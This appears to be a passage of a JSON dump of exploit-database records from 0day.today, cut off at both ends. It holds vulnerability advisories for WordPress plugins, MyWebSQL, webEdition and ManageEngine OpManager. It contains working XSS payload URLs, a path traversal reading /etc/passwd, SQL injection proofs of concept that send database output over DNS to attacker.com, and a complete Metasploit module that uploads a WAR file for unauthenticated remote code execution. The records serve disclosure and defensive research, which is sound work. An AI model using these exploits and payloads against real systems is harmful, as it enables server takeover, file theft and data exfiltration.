Reference:\r\n\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\r\nhas assigned the name CVE-2014-5298 to this vulnerability.\r\n\r\n[-] Credits:\r\n\r\nVulnerability discovered by Egidio Romano.\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22679"}, {"lastseen": "2018-01-01T01:06:51", "references": [], "edition": 2, "description": "WordPress Photo Gallery plugin version 1.1.30 suffers from a cross site scripting vulnerability.", "reporter": "High-Tech Bridge", "published": "2014-10-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "zdt", "title": "WordPress Photo Gallery 1.1.30 Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6315"], "modified": "2014-10-02T00:00:00", "id": "1337DAY-ID-22718", "href": "https://0day.today/exploit/description/22718", "sourceData": "Product: Photo Gallery WordPress plugin\r\nVendor: http://web-dorado.com/\r\nVulnerable Version(s): 1.1.30 and probably prior\r\nTested Version: 1.1.30\r\nAdvisory Publication: September 10, 2014 [without technical details]\r\nVendor Notification: September 10, 2014 \r\nVendor Patch: September 10, 2014 \r\nPublic Disclosure: October 1, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-6315\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered three vulnerabilities in Photo Gallery WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin: CVE-2014-6315\r\n\r\n1.1 Input passed via the \"callback\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&callback=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n1.2 Input passed via the \"dir\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&dir=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n1.3 Input passed via the \"extensions\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Photo Gallery 1.1.31\n\n# 0day.today [2017-12-31] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22718"}, {"lastseen": "2018-04-09T11:41:47", "references": [], "description": "WordPress Google Calendar Events plugin version 2.0.1 suffers from a cross site scripting vulnerability.", "edition": 2, "reporter": "High-Tech Bridge", "published": "2014-10-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "zdt", "title": "WordPress Google Calendar Events 2.0.1 Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7138"], "modified": "2014-10-10T00:00:00", "id": "1337DAY-ID-22744", "href": "https://0day.today/exploit/description/22744", "sourceData": "Product: Google Calendar Events WordPress plugin\r\nVendor: Phil Derksen\r\nVulnerable Version(s): 2.0.1 and probably prior\r\nTested Version: 2.0.1\r\nAdvisory Publication: September 17, 2014 [without technical details]\r\nVendor Notification: September 17, 2014 \r\nVendor Patch: October 7, 2014 \r\nPublic Disclosure: October 8, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-7138\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Google Calendar Events WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin: CVE-2014-7138\r\n\r\nInput passed via the \"gce_feed_ids\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://wordpress/wp-admin/admin-ajax.php?action=gce_ajax&gce_type=page&gce_feed_ids=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Google Calendar Events 2.0.4\r\n\r\nMore Information:\r\nhttps://github.com/pderksen/WP-Google-Calendar-Events/commit/df1fe1d71f8ce9496cc601c96839c474e49db91d\r\nhttps://github.com/pderksen/WP-Google-Calendar-Events/commit/a701ceeb410bdda9d96c9d3d12104630df5d5b43\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22744"}, {"lastseen": "2018-03-09T21:13:34", "references": [], "edition": 2, "description": "WordPress Contact Form DB plugin version 2.8.13 suffers from a cross site scripting vulnerability.", "reporter": "High-Tech Bridge", "published": "2014-10-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "zdt", "title": "WordPress Contact Form DB 2.8.13 Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7139"], "modified": "2014-10-10T00:00:00", "id": "1337DAY-ID-22743", "href": "https://0day.today/exploit/description/22743", "sourceData": "Product: Contact Form DB WordPress plugin\r\nVendor: Michael Simpson\r\nVulnerable Version(s): 2.8.13 and probably prior\r\nTested Version: 2.8.13\r\nAdvisory Publication: September 17, 2014 [without technical details]\r\nVendor Notification: September 17, 2014 \r\nVendor Patch: September 25, 2014 \r\nPublic Disclosure: October 8, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-7139\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Contact Form DB WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin installed.\r\n\r\n1) Two Cross-Site Scripting (XSS) Vulnerabilities in Contact Form DB WordPress Plugin: CVE-2014-7139\r\n\r\n1.1 Input passed via the \"form\" HTTP GET parameter to \"/wp-admin/admin.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&form=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n1.2 Input passed via the \"enc\" HTTP GET parameter to \"/wp-admin/admin.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&enc=%27%22%29;%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Contact Form DB 2.8.16.\r\n\r\nMore Information:\r\nhttps://wordpress.org/plugins/contact-form-7-to-database-extension/changelog/\n\n# 0day.today [2018-03-09] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22743"}, {"lastseen": "2018-03-19T07:13:00", "references": [], "description": "MyWebSQL version 3.4 suffers from a cross site scripting vulnerability.", "edition": 2, "reporter": "High-Tech Bridge", "published": "2014-09-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "zdt", "title": "MyWebSQL 3.4 Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4735"], "modified": "2014-09-04T00:00:00", "id": "1337DAY-ID-22590", "href": "https://0day.today/exploit/description/22590", "sourceData": "Product: MyWebSQL\r\nVendor: http://mywebsql.net/\r\nVulnerable Version(s): 3.4 and probably prior\r\nTested Version: 3.4\r\nAdvisory Publication: June 25, 2014 [without technical details]\r\nVendor Notification: June 25, 2014 \r\nPublic Disclosure: September 3, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-4735\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in MyWebSQL, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in MyWebSQL: CVE-2014-4735\r\n\r\nThe vulnerability is caused by insufficient sanitization of the \"table\" HTTP GET parameter passed to \"/index.php\" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of vulnerable website. Further exploitation of this vulnerability may grant an attacker full access to the website's databases and get complete control over it.\r\n\r\nThe following exploitation example uses the alert() JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/?q=wrkfrm&type=exporttbl&table=%27;%3C/script%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nDisclosure timeline:\r\n2014-06-25 Vendor alerted via emails and contact form.\r\n2014-07-03 Vendor alerted via emails, contact form and twitter.\r\n2014-07-03 Vendor replied that he received information.\r\n2014-07-10 Fix requested.\r\n2014-07-10 Vendor requested to move public disclosure date to August 30.\r\n2014-08-27 Fix requested.\r\n2014-08-27 Vendor didn't release any patch and agreed to disclose on August 30 without patch.\r\n2014-08-27 Disclosure date moved to September 3.\r\n2014-09-01 Fix requested.\r\n2014-09-03 Public disclosure, patch by HTB Research is available.\r\n\r\nCurrently we are not aware of any official solution for this vulnerability.\r\nUnofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23221-patch.zip\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22590"}, {"lastseen": "2018-03-14T14:38:32", "references": [], "description": "webEdition version 6.3.8.0 suffers from a path traversal vulnerability.", "edition": 2, "reporter": "High-Tech Bridge", "published": "2014-09-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "zdt", "title": "webEdition 6.3.8.0 Path Traversal Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5258"], "modified": "2014-09-18T00:00:00", "id": "1337DAY-ID-22657", "href": "https://0day.today/exploit/description/22657", "sourceData": "Vendor: webEdition e.V.\r\nVulnerable Version(s): 6.3.8.0 (SVN-Revision: 6985) and probably prior\r\nTested Version: 6.3.8.0 (SVN-Revision: 6985) \r\nAdvisory Publication: August 6, 2014 [without technical details]\r\nVendor Notification: August 6, 2014 \r\nVendor Patch: September 4, 2014 \r\nPublic Disclosure: September 17, 2014 \r\nVulnerability Type: Path Traversal [CWE-22]\r\nCVE Reference: CVE-2014-5258\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 4 (AV:N/AC:L/Au:S/C:P/I:N/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in webEdition, which can be exploited to read arbitrary files on the target system.\r\n\r\n\r\n1) Path Traversal in webEdition: CVE-2014-5258\r\n\r\nThe vulnerability exists due to insufficient sanitization of the \"file\" HTTP GET parameter in \"/webEdition/showTempFile.php\" script. A remote authenticated user can send a specially crafted HTTP GET request containing directory traversal sequences (e.g. \"../\") and read contents of arbitrary files on the target system with privileges of the web server.\r\n\r\nThe exploitation example below display contents of \"/etc/passwd\" file:\r\n\r\nhttp://[host]/webEdition/showTempFile.php?file=../../../../etc/passwd\r\n\r\nSuccessful exploitation of the vulnerability requires valid user credentials. Registration is not open by default and all user accounts are created by the administrator of the web application. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to webEdition 6.3.9 Beta\r\n\r\nMore Information:\r\nhttp://www.webedition.org/de/aktuelles/webedition-cms/webEdition-6.3.9-Beta-erschienen\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22657"}, {"lastseen": "2018-04-02T19:34:58", "references": [], "description": "Exploit for java platform in category remote exploits", "edition": 2, "reporter": "Pedro Ribeiro", "published": "2014-10-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "ManageEngine OpManager / Social IT Arbitrary File Upload Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6034"], "modified": "2014-10-01T00:00:00", "id": "1337DAY-ID-22712", "href": "https://0day.today/exploit/description/22712", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\n\r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n\r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n\r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0; IT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n\r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\nAffected versions: OpManager v? to v11.3\r\n\r\n\r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360 v? to v10.4\r\n\r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n\r\n\r\n##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\nRank = ExcellentRanking\r\n\r\ninclude Msf::Exploit::Remote::HttpClient\r\ninclude Msf::Exploit::FileDropper\r\n\r\ndef initialize(info = {})\r\nsuper(update_info(info,\r\n'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload',\r\n'Description' => %q{\r\nThis module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.\r\nThe vulnerability exists in the FileCollector servlet which accepts unauthenticated\r\nfile uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on\r\nversion 11.0 of SocialIT for Windows and Linux.\r\n},\r\n'Author' =>\r\n[\r\n'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\r\n],\r\n'License' => MSF_LICENSE,\r\n'References' =>\r\n[\r\n[ 'CVE', '2014-6034' ],\r\n[ 'OSVDB', '112276' ],\r\n[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt'\r\n],\r\n[ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]\r\n],\r\n'Privileged' => true,\r\n'Platform' => 'java',\r\n'Arch' => ARCH_JAVA,\r\n'Targets' =>\r\n[\r\n[ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ]\r\n],\r\n'DefaultTarget' => 0,\r\n'DisclosureDate' => 'Sep 27 2014'))\r\n\r\nregister_options(\r\n[\r\nOpt::RPORT(80),\r\nOptInt.new('SLEEP',\r\n[true, 'Seconds to sleep while we wait for WAR deployment', 15]),\r\n], self.class)\r\nend\r\n\r\ndef check\r\nres = send_request_cgi({\r\n'uri' =>\r\nnormalize_uri(\"/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector\"),\r\n'method' => 'GET'\r\n})\r\n\r\n# A GET request on this servlet returns \"405 Method not allowed\"\r\nif res and res.code == 405\r\nreturn Exploit::CheckCode::Detected\r\nend\r\n\r\nreturn Exploit::CheckCode::Safe\r\nend\r\n\r\n\r\ndef upload_war_and_exec(try_again, app_base)\r\ntomcat_path = '../../../tomcat/'\r\nservlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector'\r\n\r\nif try_again\r\n# We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration\r\n# does not allow us to deploy WARs. Fix that by uploading a new context.xml file.\r\n# The file we are uploading has the same content apart from privileged=\"false\" and lots of XML\r\ncomments.\r\n# After replacing the context.xml file let's upload the WAR again.\r\nprint_status(\"#{peer} - Replacing Tomcat context file\")\r\nsend_request_cgi({\r\n'uri' => normalize_uri(servlet_path),\r\n'method' => 'POST',\r\n'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context\r\nprivileged=\"true\"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>},\r\n'ctype' => 'application/xml',\r\n'vars_get' => {\r\n'regionID' => tomcat_path + \"conf\",\r\n'FILENAME' => \"context.xml\"\r\n}\r\n})\r\nelse\r\n# We need to create the upload directories before our first attempt to upload the WAR.\r\nprint_status(\"#{peer} - Creating upload directories\")\r\nbogus_file = rand_text_alphanumeric(4 + rand(32 - 4))\r\nsend_request_cgi({\r\n'uri' => normalize_uri(servlet_path),\r\n'method' => 'POST',\r\n'data' => rand_text_alphanumeric(4 + rand(32 - 4)),\r\n'ctype' => 'application/xml',\r\n'vars_get' => {\r\n'regionID' => \"\",\r\n'FILENAME' => bogus_file\r\n}\r\n})\r\nregister_files_for_cleanup(\"state/archivedata/zip/\" + bogus_file)\r\nend\r\n\r\nwar_payload = payload.encoded_war({ :app_name => app_base }).to_s\r\n\r\nprint_status(\"#{peer} - Uploading WAR file...\")\r\nres = send_request_cgi({\r\n'uri' => normalize_uri(servlet_path),\r\n'method' => 'POST',\r\n'data' => war_payload,\r\n'ctype' => 'application/octet-stream',\r\n'vars_get' => {\r\n'regionID' => tomcat_path + \"webapps\",\r\n'FILENAME' => app_base + \".war\"\r\n}\r\n})\r\n\r\n# The server either returns a 500 error or a 200 OK when the upload is successful.\r\nif res and (res.code == 500 or res.code == 200)\r\nprint_status(\"#{peer} - Upload appears to have been successful, waiting \" + datastore['SLEEP'].to_s +\r\n\" seconds for deployment\")\r\nsleep(datastore['SLEEP'])\r\nelse\r\nfail_with(Exploit::Failure::Unknown, \"#{peer} - WAR upload failed\")\r\nend\r\n\r\nprint_status(\"#{peer} - Executing payload, wait for session...\")\r\nsend_request_cgi({\r\n'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),\r\n'method' => 'GET'\r\n})\r\nend\r\n\r\n\r\ndef exploit\r\napp_base = rand_text_alphanumeric(4 + rand(32 - 4))\r\n\r\nupload_war_and_exec(false, app_base)\r\nregister_files_for_cleanup(\"tomcat/webapps/\" + \"#{app_base}.war\")\r\n\r\nsleep_counter = 0\r\nwhile not session_created?\r\nif sleep_counter == datastore['SLEEP']\r\nprint_error(\"#{peer} - Failed to get a shell, let's try one more time\")\r\nupload_war_and_exec(true, app_base)\r\nreturn\r\nend\r\n\r\nsleep(1)\r\nsleep_counter += 1\r\nend\r\nend\r\nend\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3, then install the patch in https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4).\r\nManageEngine have indicated that the soon to be released OpManager version 11.4 might not have the fix as the release is almost ready. They are planning to include the fix in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22712"}, {"lastseen": "2018-03-06T03:35:34", "references": [], "edition": 2, "description": "WordPress All In One WP Security plugin version 3.8.2 suffers from multiple remote SQL injection vulnerabilities.", "reporter": "High-Tech Bridge", "published": "2014-09-25T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "zdt", "title": "WordPress All In One WP Security Plugin 3.8.2 SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6242"], "modified": "2014-09-25T00:00:00", "id": "1337DAY-ID-22694", "href": "https://0day.today/exploit/description/22694", "sourceData": "Product: All In One WP Security WordPress plugin\r\nVendor: Tips and Tricks HQ, Peter, Ruhul, Ivy \r\nVulnerable Version(s): 3.8.2 and probably prior\r\nTested Version: 3.8.2\r\nAdvisory Publication: September 3, 2014 [without technical details]\r\nVendor Notification: September 3, 2014 \r\nVendor Patch: September 12, 2014 \r\nPublic Disclosure: September 24, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-6242\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. \r\n\r\n\r\n1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242\r\n\r\n1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"orderby\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"orderby\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n\r\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.:\r\n\r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n\r\n\r\n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"order\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"order\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n\r\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.:\r\n\r\n<img src=\"http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\">\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to All In One WP Security 3.8.3\r\n\r\nMore Information:\r\nhttps://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/\n\n# 0day.today [2018-03-06] #", "cvss": {"score": 6.5, "vector": 